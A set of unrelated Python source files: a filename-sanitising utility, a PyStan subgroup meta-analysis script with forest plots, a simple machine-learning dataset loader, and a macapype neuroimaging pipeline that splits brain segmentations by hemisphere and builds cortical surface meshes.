for ext_index in range(1,names_qantum-1) :
ext_name=names_list[ext_index]
new_ext_name=self.convert(ext_name,convert_ext_tabl)
names_list[ext_index]=new_ext_name
return names_list
def undots(self,base_name,ext_names,max_ext):
"""allow a certain number of .ext and merge the others"""
#print(base_name,ext_names,max_ext)
ext_quantum=len(ext_names)
if ext_quantum==0 :
return [base_name]
elif max_ext==-1 :
return [base_name]+ext_names
elif max_ext==0 :
return [SUBSTITUTE_DOT.join([base_name]+ext_names)]
else :
if ext_quantum>max_ext :
base_name=SUBSTITUTE_DOT.join([base_name]+ext_names[:0-max_ext])
ext_names=ext_names[0-max_ext:]
return [base_name]+ext_names
else :
return [base_name]+ext_names
def uncode(self,name):
"""decode URL special characters"""
return text.decode_url(name)
def ascii(self,name):
"""Replace special accents characters by their closest ASCII equivalents"""
return text.to_ascii(name)
def unspaces(self,name):
"""replace blank space by _"""
name=name.replace(' ',SUBSTITUTE_SPACE)
return name
def set_case(self,name,change):
"""switch caracteres case (1=upper,-1=lower,0=no change)"""
if change>0 :
new_name=name.upper()
elif change<0 :
new_name=name.lower()
else :
new_name=name
return new_name
def strip(self,name,strip_list):
"""delete the specified characters if name beginning or ending with"""
new_name=name
while True :
for s in strip_list :
new_name=new_name.strip(s)
if name==new_name :
break
else :
name=new_name
return new_name
def merge(self,name,merge_list):
"""merge the specified characters"""
new_name=name
while True :
for s in merge_list:
new_name=new_name.replace(s+s,s)
if name==new_name :
break
else :
name=new_name
return new_name
def eraze(self,name,eraze_list):
"""remove the specified characters"""
new_name=name
while True :
for s in eraze_list :
new_name=new_name.replace(s,'')
if name==new_name :
break
else :
name=new_name
return new_name
def convert(self,name,convert_tabl):
"""convert the specific characters by other characters"""
new_name=name
while True :
for n in convert_tabl :
for o in convert_tabl[n] :
new_name=new_name.replace(o,n)
if name==new_name :
break
else :
name=new_name
return new_name
def normalize(self,name,sp_char):
"""substitute special system characters"""
bad_chars=CONTROL_CHAR+SYSTEM_CHAR+QUOTE_CHAR+DOUBLE_QUOTE_CHAR
for c in bad_chars :
name=name.replace(c,sp_char)
#print(name)
return name
| 2 | 2 |
src/subgroup_analysis.py | volkale/advr | 0 | 12757448 | <filename>src/subgroup_analysis.py
import arviz as az
import numpy as np
import os
import pystan
import matplotlib.pyplot as plt
from lib.stan_utils import compile_model, get_pickle_filename, get_model_code
from lib.drug_classes import DRUG_CLASSES
from prepare_data import get_formatted_data, add_rank_column, aggregate_treatment_arms, get_variability_effect_sizes
# set path to stan model files
dir_name = os.path.dirname(os.path.abspath(__file__))
parent_dir_name = os.path.dirname(dir_name)
stan_model_path = os.path.join(dir_name, 'stan_models')
def get_data_dict(df, effect_statistic):
return {
'N': len(df.study_id.unique()),
'Y': df.groupby(['study_id']).agg({effect_statistic: 'first'}).reset_index()[effect_statistic].values,
'Y_meas': df.groupby(['study_id']).agg({effect_statistic: 'first'}).reset_index()[effect_statistic].values,
'X_meas': df.groupby(['study_id']).agg({'lnRR': 'first'}).reset_index()['lnRR'].values,
'SD_Y': np.sqrt(df.groupby(['study_id']).agg(
{f'var_{effect_statistic}': 'first'}).reset_index()[f'var_{effect_statistic}'].values),
'SD_X': np.sqrt(df.groupby(['study_id']).agg(
{'var_lnRR': 'first'}).reset_index()['var_lnRR'].values),
'run_estimation': 1
}
def get_subgroup_models():
df = get_formatted_data()
# drug class subgroup analysis
model_res_dict = {}
for drug_class in DRUG_CLASSES:
study_ids = df.query(f'drug_class == "{drug_class}"').study_id.unique()
df_sub = df[(df.study_id.isin(study_ids)) & (df.drug_class.isin([drug_class, 'placebo']))].copy()
placebo_controlled_study_ids = set(df_sub.query('is_active == 1')['study_id']) \
.intersection(df_sub.query('is_active == 0')['study_id'])
df_sub = df_sub[df_sub.study_id.isin(placebo_controlled_study_ids)]
for column in ['study_id', 'scale', 'drug_class']:
df_sub = add_rank_column(df_sub, column)
df_sub = aggregate_treatment_arms(df_sub)
df_sub = get_variability_effect_sizes(df_sub)
model = 'remr'
stan_model = compile_model(
os.path.join(stan_model_path, f'{model}.stan'),
model_name=model
)
data_dict = get_data_dict(df_sub, 'lnVR')
fit = stan_model.sampling(
data=data_dict,
iter=4000,
warmup=1000,
chains=3,
control={'adapt_delta': 0.99},
check_hmc_diagnostics=True,
seed=1
)
pystan.check_hmc_diagnostics(fit)
data = az.from_pystan(
posterior=fit,
posterior_predictive=['Y_pred'],
observed_data=['Y_meas', 'X_meas'],
log_likelihood='log_lik',
)
model_res_dict[drug_class] = data
return model_res_dict
def plot_model_comparison_CIs(model_res_dict):
fig, ax = plt.subplots(nrows=1)
datasets = [
az.convert_to_dataset(
{drug_class: np.exp(model_res_dict[drug_class].posterior.mu.values)}
) for drug_class in DRUG_CLASSES
]
_ = az.plot_forest(
datasets,
combined=True,
credible_interval=0.95,
quartiles=True,
colors='black',
var_names=DRUG_CLASSES,
model_names=['', '', '', ''],
ax=ax
)
ax.set_title('95% HDI $e^\\mu$')
plt.tight_layout()
plt.savefig(os.path.join(parent_dir_name, f'output/hdi_drug_class_comparison.tiff'), format='tiff', dpi=500,
bbox_inches="tight")
return plt
| 2.359375 | 2 |
ai/corrections/ml_d06/Dataset.py | PoCFrance/security-pool-2018 | 8 | 12757449 | import re
import math
class Exemple:
def __init__(self):
self.inputs = []
self.outputs = []
class Dataset:
def __init__(self, filename):
try:
file = open(filename, "r")
except:
raise ValueError("Cannot open dataset")
else:
line = file.readline()
nbrs = [int(x) for x in line.split()] # Parse read line in number list
self.nb_exemple = int(nbrs[0]) # Get nb exemples, inputs and outputs
self.nb_input = int(nbrs[1])
self.nb_output = int(nbrs[2])
self.exemples = []
for i in range(0, self.nb_exemple): # Read each exemples
inputline = file.readline()
outputline = file.readline()
self.loadData(inputline, outputline)
file.close()
# Create an new exemples with 2 readed lines
# (1 for inputs and 1 for expected outputs)
def loadData(self, inputline, outputline):
ex = Exemple()
inputs = [float(x) for x in inputline.split()]
outputs = [float(x) for x in outputline.split()]
ex.inputs.extend(inputs)
ex.outputs.extend(outputs)
self.exemples.append(ex)
def computeMean(self, index):
sum = 0
for i in range(0, len(self.exemples)):
sum += self.exemples[i].inputs[index]
return sum / len(self.exemples)
def computeStandardDev(self, index, mean):
sum = 0
for i in range(0, len(self.exemples)):
sum += math.pow(self.exemples[i].inputs[index] - mean, 2)
return math.sqrt(sum / len(self.exemples))
def normalize(self):
for i in range(0, len(self.exemples[0].inputs)):
mean = self.computeMean(i)
s = self.computeStandardDev(i, mean)
for j in range(0, len(self.exemples)):
self.exemples[j].inputs[i] = (self.exemples[j].inputs[i] - mean) / s
| 3.453125 | 3 |
macapype/pipelines/surface.py | Macatools/macapype | 7 | 12757450 | <reponame>Macatools/macapype<filename>macapype/pipelines/surface.py
import nipype.interfaces.utility as niu
import nipype.pipeline.engine as pe
import nipype.interfaces.fsl as fsl
import nipype.interfaces.afni as afni
import nipype.interfaces.freesurfer as fs
import macapype.nodes.register as reg
from macapype.nodes.surface import Meshify, split_LR_mask
from macapype.utils.utils_nodes import parse_key, NodeParams
def _create_split_hemi_pipe(params, params_template, name="split_hemi_pipe"):
"""Description: Split segmentated tissus according hemisheres after \
removal of cortical structure
Processing steps:
- TODO
Params:
- None so far
Inputs:
inputnode:
warpinv_file:
non-linear transformation (from NMT_subject_align)
inv_transfo_file:
inverse transformation
aff_file:
affine transformation file
t1_ref_file:
preprocessd T1
segmented_file:
from atropos segmentation, with all the tissues segmented
arguments:
params:
dictionary of node sub-parameters (from a json file)
name:
pipeline name (default = "split_hemi_pipe")
Outputs:
"""
split_hemi_pipe = pe.Workflow(name=name)
# creating inputnode
inputnode = pe.Node(
niu.IdentityInterface(fields=['warpinv_file',
'inv_transfo_file',
'aff_file',
't1_ref_file',
'segmented_file']),
name='inputnode')
# get values
if "cereb_template" in params_template.keys():
cereb_template_file = params_template["cereb_template"]
# ### cereb
# Binarize cerebellum
bin_cereb = pe.Node(interface=fsl.UnaryMaths(), name='bin_cereb')
bin_cereb.inputs.operation = "bin"
bin_cereb.inputs.in_file = cereb_template_file
# Warp cereb brainmask to subject space
warp_cereb = pe.Node(interface=reg.NwarpApplyPriors(),
name='warp_cereb')
warp_cereb.inputs.in_file = cereb_template_file
warp_cereb.inputs.out_file = cereb_template_file
warp_cereb.inputs.interp = "NN"
warp_cereb.inputs.args = "-overwrite"
split_hemi_pipe.connect(bin_cereb, 'out_file', warp_cereb, 'in_file')
split_hemi_pipe.connect(inputnode, 'aff_file',
warp_cereb, 'master')
split_hemi_pipe.connect(inputnode, 'warpinv_file', warp_cereb, "warp")
# Align cereb template
align_cereb = pe.Node(interface=afni.Allineate(), name='align_cereb')
align_cereb.inputs.final_interpolation = "nearestneighbour"
align_cereb.inputs.overwrite = True
align_cereb.inputs.outputtype = "NIFTI_GZ"
split_hemi_pipe.connect(warp_cereb, 'out_file',
align_cereb, "in_file") # -source
split_hemi_pipe.connect(inputnode, 't1_ref_file',
align_cereb, "reference") # -base
split_hemi_pipe.connect(inputnode, 'inv_transfo_file',
align_cereb, "in_matrix") # -1Dmatrix_apply
if "L_hemi_template" in params_template.keys() and \
"R_hemi_template" in params_template.keys():
L_hemi_template_file = params_template["L_hemi_template"]
R_hemi_template_file = params_template["R_hemi_template"]
# Warp L hemi template brainmask to subject space
warp_L_hemi = pe.Node(interface=reg.NwarpApplyPriors(),
name='warp_L_hemi')
warp_L_hemi.inputs.in_file = L_hemi_template_file
warp_L_hemi.inputs.out_file = L_hemi_template_file
warp_L_hemi.inputs.interp = "NN"
warp_L_hemi.inputs.args = "-overwrite"
split_hemi_pipe.connect(inputnode, 'aff_file',
warp_L_hemi, 'master')
split_hemi_pipe.connect(inputnode, 'warpinv_file', warp_L_hemi, "warp")
# Align L hemi template
align_L_hemi = pe.Node(interface=afni.Allineate(), name='align_L_hemi')
align_L_hemi.inputs.final_interpolation = "nearestneighbour"
align_L_hemi.inputs.overwrite = True
align_L_hemi.inputs.outputtype = "NIFTI_GZ"
split_hemi_pipe.connect(warp_L_hemi, 'out_file',
align_L_hemi, "in_file") # -source
split_hemi_pipe.connect(inputnode, 't1_ref_file',
align_L_hemi, "reference") # -base
split_hemi_pipe.connect(inputnode, 'inv_transfo_file',
align_L_hemi, "in_matrix") # -1Dmatrix_apply
# Warp R hemi template brainmask to subject space
warp_R_hemi = pe.Node(interface=reg.NwarpApplyPriors(),
name='warp_R_hemi')
warp_R_hemi.inputs.in_file = R_hemi_template_file
warp_R_hemi.inputs.out_file = R_hemi_template_file
warp_R_hemi.inputs.interp = "NN"
warp_R_hemi.inputs.args = "-overwrite"
split_hemi_pipe.connect(inputnode, 'aff_file',
warp_R_hemi, 'master')
split_hemi_pipe.connect(inputnode, 'warpinv_file', warp_R_hemi, "warp")
# Align R hemi template
align_R_hemi = pe.Node(interface=afni.Allineate(), name='align_R_hemi')
align_R_hemi.inputs.final_interpolation = "nearestneighbour"
align_R_hemi.inputs.overwrite = True
align_R_hemi.inputs.outputtype = "NIFTI_GZ"
split_hemi_pipe.connect(warp_R_hemi, 'out_file',
align_R_hemi, "in_file") # -source
split_hemi_pipe.connect(inputnode, 't1_ref_file',
align_R_hemi, "reference") # -base
split_hemi_pipe.connect(inputnode, 'inv_transfo_file',
align_R_hemi, "in_matrix") # -1Dmatrix_apply
elif "LR_hemi_template" in params_template.keys():
LR_hemi_template_file = params_template["LR_hemi_template"]
# Warp LR hemi template brainmask to subject space
warp_LR_hemi = pe.Node(interface=reg.NwarpApplyPriors(),
name='warp_LR_hemi')
warp_LR_hemi.inputs.in_file = LR_hemi_template_file
warp_LR_hemi.inputs.out_file = LR_hemi_template_file
warp_LR_hemi.inputs.interp = "NN"
warp_LR_hemi.inputs.args = "-overwrite"
split_hemi_pipe.connect(inputnode, 'aff_file',
warp_LR_hemi, 'master')
split_hemi_pipe.connect(inputnode, 'warpinv_file',
warp_LR_hemi, "warp")
# Align LR hemi template
align_LR_hemi = pe.Node(interface=afni.Allineate(),
name='align_LR_hemi')
align_LR_hemi.inputs.final_interpolation = "nearestneighbour"
align_LR_hemi.inputs.overwrite = True
align_LR_hemi.inputs.outputtype = "NIFTI_GZ"
split_hemi_pipe.connect(warp_LR_hemi, 'out_file',
align_LR_hemi, "in_file") # -source
split_hemi_pipe.connect(inputnode, 't1_ref_file',
align_LR_hemi, "reference") # -base
split_hemi_pipe.connect(inputnode, 'inv_transfo_file',
align_LR_hemi, "in_matrix") # -1Dmatrix_apply
split_LR = pe.Node(
interface=niu.Function(
input_names=["LR_mask_file"],
output_names=["L_mask_file", "R_mask_file"],
function=split_LR_mask),
name="split_LR")
split_hemi_pipe.connect(align_LR_hemi, "out_file",
split_LR, 'LR_mask_file')
else:
print("Error, could not find LR_hemi_template or L_hemi_template and \
R_hemi_template, skipping")
print(params_template.keys())
exit()
# Using LH and RH masks to obtain hemisphere segmentation masks
calc_L_hemi = pe.Node(interface=afni.Calc(), name='calc_L_hemi')
calc_L_hemi.inputs.expr = 'a*b/b'
calc_L_hemi.inputs.outputtype = 'NIFTI_GZ'
split_hemi_pipe.connect(inputnode, 'segmented_file',
calc_L_hemi, "in_file_a")
if "LR_hemi_template" in params_template.keys():
split_hemi_pipe.connect(split_LR, 'L_mask_file',
calc_L_hemi, "in_file_b")
else:
split_hemi_pipe.connect(align_L_hemi, 'out_file',
calc_L_hemi, "in_file_b")
# R_hemi
calc_R_hemi = pe.Node(interface=afni.Calc(),
name='calc_R_hemi')
calc_R_hemi.inputs.expr = 'a*b/b'
calc_R_hemi.inputs.outputtype = 'NIFTI_GZ'
split_hemi_pipe.connect(inputnode, 'segmented_file',
calc_R_hemi, "in_file_a")
if "LR_hemi_template" in params_template.keys():
split_hemi_pipe.connect(split_LR, 'R_mask_file',
calc_R_hemi, "in_file_b")
else:
split_hemi_pipe.connect(align_R_hemi, 'out_file',
calc_R_hemi, "in_file_b")
# remove cerebellum from left and right brain segmentations
calc_nocb_L_hemi = pe.Node(interface=afni.Calc(),
name='calc_nocb_L_hemi')
calc_nocb_L_hemi.inputs.expr = '(a*(not (b)))'
calc_nocb_L_hemi.inputs.outputtype = 'NIFTI_GZ'
split_hemi_pipe.connect(calc_L_hemi, 'out_file',
calc_nocb_L_hemi, "in_file_a")
split_hemi_pipe.connect(align_cereb, 'out_file',
calc_nocb_L_hemi, "in_file_b")
calc_nocb_R_hemi = pe.Node(interface=afni.Calc(),
name='calc_nocb_R_hemi')
calc_nocb_R_hemi.inputs.expr = '(a*(not (b)))'
calc_nocb_R_hemi.inputs.outputtype = 'NIFTI_GZ'
split_hemi_pipe.connect(calc_R_hemi, 'out_file',
calc_nocb_R_hemi, "in_file_a")
split_hemi_pipe.connect(align_cereb, 'out_file',
calc_nocb_R_hemi, "in_file_b")
# create L/R GM and WM no-cerebellum masks from subject brain segmentation
calc_GM_nocb_L_hemi = pe.Node(interface=afni.Calc(),
name='calc_GM_nocb_L_hemi')
calc_GM_nocb_L_hemi.inputs.expr = 'iszero(a-2)'
calc_GM_nocb_L_hemi.inputs.outputtype = 'NIFTI_GZ'
split_hemi_pipe.connect(calc_nocb_L_hemi, 'out_file',
calc_GM_nocb_L_hemi, "in_file_a")
calc_WM_nocb_L_hemi = pe.Node(interface=afni.Calc(),
name='calc_WM_nocb_L_hemi')
calc_WM_nocb_L_hemi.inputs.expr = 'iszero(a-3)'
calc_WM_nocb_L_hemi.inputs.outputtype = 'NIFTI_GZ'
split_hemi_pipe.connect(calc_nocb_L_hemi, 'out_file',
calc_WM_nocb_L_hemi, "in_file_a")
calc_GM_nocb_R_hemi = pe.Node(interface=afni.Calc(),
name='calc_GM_nocb_R_hemi')
calc_GM_nocb_R_hemi.inputs.expr = 'iszero(a-2)'
calc_GM_nocb_R_hemi.inputs.outputtype = 'NIFTI_GZ'
split_hemi_pipe.connect(calc_nocb_R_hemi, 'out_file',
calc_GM_nocb_R_hemi, "in_file_a")
calc_WM_nocb_R_hemi = pe.Node(interface=afni.Calc(),
name='calc_WM_nocb_R_hemi')
calc_WM_nocb_R_hemi.inputs.expr = 'iszero(a-3)'
calc_WM_nocb_R_hemi.inputs.outputtype = 'NIFTI_GZ'
split_hemi_pipe.connect(calc_nocb_R_hemi, 'out_file',
calc_WM_nocb_R_hemi, "in_file_a")
# Extract Cerebellum using template mask transformed to subject space
extract_cereb = pe.Node(interface=afni.Calc(), name='extract_cereb')
extract_cereb.inputs.expr = 'a*b/b'
extract_cereb.inputs.outputtype = 'NIFTI_GZ'
split_hemi_pipe.connect(inputnode, 't1_ref_file',
extract_cereb, "in_file_a")
split_hemi_pipe.connect(align_cereb, 'out_file',
extract_cereb, "in_file_b")
# Extract L.GM using template mask transformed to subject space
extract_L_GM = pe.Node(interface=afni.Calc(), name='extract_L_GM')
extract_L_GM.inputs.expr = 'a*b/b'
extract_L_GM.inputs.outputtype = 'NIFTI_GZ'
split_hemi_pipe.connect(inputnode, 't1_ref_file',
extract_L_GM, "in_file_a")
split_hemi_pipe.connect(calc_GM_nocb_L_hemi, 'out_file',
extract_L_GM, "in_file_b")
# Extract L.WM using template mask transformed to subject space
extract_L_WM = pe.Node(interface=afni.Calc(), name='extract_L_WM')
extract_L_WM.inputs.expr = 'a*b/b'
extract_L_WM.inputs.outputtype = 'NIFTI_GZ'
split_hemi_pipe.connect(inputnode, 't1_ref_file',
extract_L_WM, "in_file_a")
split_hemi_pipe.connect(calc_WM_nocb_L_hemi, 'out_file',
extract_L_WM, "in_file_b")
# Extract L.GM using template mask transformed to subject space
extract_R_GM = pe.Node(interface=afni.Calc(), name='extract_R_GM')
extract_R_GM.inputs.expr = 'a*b/b'
extract_R_GM.inputs.outputtype = 'NIFTI_GZ'
split_hemi_pipe.connect(inputnode, 't1_ref_file',
extract_R_GM, "in_file_a")
split_hemi_pipe.connect(calc_GM_nocb_R_hemi, 'out_file',
extract_R_GM, "in_file_b")
# Extract L.WM using template mask transformed to subject space
extract_R_WM = pe.Node(interface=afni.Calc(), name='extract_R_WM')
extract_R_WM.inputs.expr = 'a*b/b'
extract_R_WM.inputs.outputtype = 'NIFTI_GZ'
split_hemi_pipe.connect(inputnode, 't1_ref_file',
extract_R_WM, "in_file_a")
split_hemi_pipe.connect(calc_WM_nocb_R_hemi, 'out_file',
extract_R_WM, "in_file_b")
return split_hemi_pipe
def create_nii_to_mesh_pipe(params, params_template, name="nii_to_mesh_pipe"):
"""
Description: basic nii to mesh pipeline after segmentation
Processing steps:
- split in hemisphere after removal of the subcortical structures
- using scipy marching cube methods to compute mesh
- some smoothing (using brain-slam)
Params:
- split_hemi_pipe (see :class:`_create_split_hemi_pipe \
<macapype.pipelines.surface._create_split_hemi_pipe>` for arguments)
- mesh_L_GM, mesh_R_GM, mesh_L_WM, mesh_R_WM (see :class:`Meshify \
<macapype.nodes.surface.Meshify>` for arguments)
Inputs:
inputnode:
warpinv_file:
non-linear transformation (from NMT_subject_align)
inv_transfo_file:
inverse transformation
aff_file:
affine transformation file
t1_ref_file:
preprocessd T1
segmented_file:
from atropos segmentation, with all the tissues segmented
arguments:
params:
dictionary of node sub-parameters (from a json file)
name:
pipeline name (default = "nii_to_mesh_pipe")
Outputs:
"""
# creating pipeline
mesh_to_seg_pipe = pe.Workflow(name=name)
# creating inputnode
inputnode = pe.Node(
niu.IdentityInterface(fields=['warpinv_file',
'inv_transfo_file',
'aff_file',
't1_ref_file',
'segmented_file']),
name='inputnode')
# split hemi pipe (+ cerebellum)
split_hemi_pipe = _create_split_hemi_pipe(
params=parse_key(params, "split_hemi_pipe"),
params_template=params_template)
mesh_to_seg_pipe.connect(inputnode, 'warpinv_file',
split_hemi_pipe, 'inputnode.warpinv_file')
mesh_to_seg_pipe.connect(inputnode, 'inv_transfo_file',
split_hemi_pipe, 'inputnode.inv_transfo_file')
mesh_to_seg_pipe.connect(inputnode, 'aff_file',
split_hemi_pipe, 'inputnode.aff_file')
mesh_to_seg_pipe.connect(inputnode, 't1_ref_file',
split_hemi_pipe, 'inputnode.t1_ref_file')
mesh_to_seg_pipe.connect(inputnode, 'segmented_file',
split_hemi_pipe, 'inputnode.segmented_file')
# meshify L GM hemisphere
mesh_L_GM = NodeParams(interface=Meshify(),
params=parse_key(params, "mesh_L_GM"),
name="mesh_L_GM")
mesh_to_seg_pipe.connect(split_hemi_pipe, 'extract_L_GM.out_file',
mesh_L_GM, "image_file")
# meshify R GM hemisphere
mesh_R_GM = NodeParams(interface=Meshify(),
params=parse_key(params, "mesh_R_GM"),
name="mesh_R_GM")
mesh_to_seg_pipe.connect(split_hemi_pipe, 'extract_R_GM.out_file',
mesh_R_GM, "image_file")
# meshify L WM hemisphere
mesh_L_WM = NodeParams(interface=Meshify(),
params=parse_key(params, "mesh_L_WM"),
name="mesh_L_WM")
mesh_to_seg_pipe.connect(split_hemi_pipe, 'extract_L_WM.out_file',
mesh_L_WM, "image_file")
# meshify R WM hemisphere
mesh_R_WM = NodeParams(interface=Meshify(),
params=parse_key(params, "mesh_R_WM"),
name="mesh_R_WM")
mesh_to_seg_pipe.connect(split_hemi_pipe, 'extract_R_WM.out_file',
mesh_R_WM, "image_file")
return mesh_to_seg_pipe
###############################################################################
# using freesurfer tools to build the mesh through tesselation
def create_nii_to_mesh_fs_pipe(params, name="nii_to_mesh_fs_pipe"):
"""
Description: surface generation using freesurfer tools
Params:
- fill_wm (see `MRIFill <https://nipype.readthedocs.io/en/0.12.1/\
interfaces/generated/nipype.interfaces.freesurfer.utils.html#mrifill>`_) \
- also available as :ref:`indiv_params <indiv_params>`
Inputs:
inputnode:
wm_mask_file:
segmented white matter mask (binary) in template space
reg_brain_file:
preprocessd T1, registered to template
indiv_params (opt):
dict with individuals parameters for some nodes
arguments:
params:
dictionary of node sub-parameters (from a json file)
name:
pipeline name (default = "nii_to_mesh_fs_pipe")
Outputs:
"""
# creating pipeline
nii_to_mesh_fs_pipe = pe.Workflow(name=name)
# creating inputnode
inputnode = pe.Node(
niu.IdentityInterface(fields=['wm_mask_file', 'reg_brain_file',
'indiv_params']),
name='inputnode')
# bin_wm
bin_wm = pe.Node(interface=fsl.UnaryMaths(), name="bin_wm")
bin_wm.inputs.operation = "fillh"
nii_to_mesh_fs_pipe.connect(inputnode, 'wm_mask_file',
bin_wm, 'in_file')
# resample everything
refit_wm = pe.Node(interface=afni.Refit(), name="refit_wm")
refit_wm.inputs.args = "-xdel 1.0 -ydel 1.0 -zdel 1.0 -keepcen"
nii_to_mesh_fs_pipe.connect(bin_wm, 'out_file',
refit_wm, 'in_file')
# resample everything
refit_reg = pe.Node(interface=afni.Refit(), name="refit_reg")
refit_reg.inputs.args = "-xdel 1.0 -ydel 1.0 -zdel 1.0 -keepcen"
nii_to_mesh_fs_pipe.connect(inputnode, 'reg_brain_file',
refit_reg, 'in_file')
# mri_convert wm to freesurfer mgz
convert_wm = pe.Node(interface=fs.MRIConvert(),
name="convert_wm")
convert_wm.inputs.out_type = "mgz"
convert_wm.inputs.conform = True
nii_to_mesh_fs_pipe.connect(refit_wm, 'out_file',
convert_wm, 'in_file')
# mri_convert reg to freesurfer mgz
convert_reg = pe.Node(interface=fs.MRIConvert(),
name="convert_reg")
convert_reg.inputs.out_type = "mgz"
convert_reg.inputs.conform = True
nii_to_mesh_fs_pipe.connect(refit_reg, 'out_file',
convert_reg, 'in_file')
# mri_fill
fill_wm = NodeParams(interface=fs.MRIFill(),
params=parse_key(params, "fill_wm"),
name="fill_wm")
fill_wm.inputs.out_file = "filled.mgz"
nii_to_mesh_fs_pipe.connect(convert_wm, 'out_file',
fill_wm, 'in_file')
nii_to_mesh_fs_pipe.connect(
inputnode, ("indiv_params", parse_key, "fill_wm"),
fill_wm, 'indiv_params')
# pretesselate wm
pretess_wm = pe.Node(interface=fs.MRIPretess(),
name="pretess_wm")
pretess_wm.inputs.label = 255
nii_to_mesh_fs_pipe.connect(fill_wm, 'out_file',
pretess_wm, 'in_filled')
nii_to_mesh_fs_pipe.connect(convert_reg, 'out_file',
pretess_wm, 'in_norm')
# tesselate wm lh
tess_wm_lh = pe.Node(interface=fs.MRITessellate(), name="tess_wm_lh")
tess_wm_lh.inputs.label_value = 255
tess_wm_lh.inputs.out_file = "lh_tess"
nii_to_mesh_fs_pipe.connect(pretess_wm, 'out_file',
tess_wm_lh, 'in_file')
# tesselate wm rh
tess_wm_rh = pe.Node(interface=fs.MRITessellate(), name="tess_wm_rh")
tess_wm_rh.inputs.label_value = 127
tess_wm_rh.inputs.out_file = "rh_tess"
nii_to_mesh_fs_pipe.connect(pretess_wm, 'out_file',
tess_wm_rh, 'in_file')
# ExtractMainComponent lh
extract_mc_lh = pe.Node(interface=fs.ExtractMainComponent(),
name="extract_mc_lh")
nii_to_mesh_fs_pipe.connect(tess_wm_lh, 'surface',
extract_mc_lh, 'in_file')
extract_mc_lh.inputs.out_file = "lh.lh_tess.maincmp"
# ExtractMainComponent rh
extract_mc_rh = pe.Node(interface=fs.ExtractMainComponent(),
name="extract_mc_rh")
nii_to_mesh_fs_pipe.connect(tess_wm_rh, 'surface',
extract_mc_rh, 'in_file')
extract_mc_rh.inputs.out_file = "rh.rh_tess.maincmp"
# SmoothTessellation lh
smooth_tess_lh = pe.Node(interface=fs.SmoothTessellation(),
name="smooth_tess_lh")
smooth_tess_lh.inputs.disable_estimates = True
nii_to_mesh_fs_pipe.connect(extract_mc_lh, 'out_file',
smooth_tess_lh, 'in_file')
# SmoothTessellation rh
smooth_tess_rh = pe.Node(interface=fs.SmoothTessellation(),
name="smooth_tess_rh")
smooth_tess_rh.inputs.disable_estimates = True
nii_to_mesh_fs_pipe.connect(extract_mc_rh, 'out_file',
smooth_tess_rh, 'in_file')
return nii_to_mesh_fs_pipe
| 2.03125 | 2 |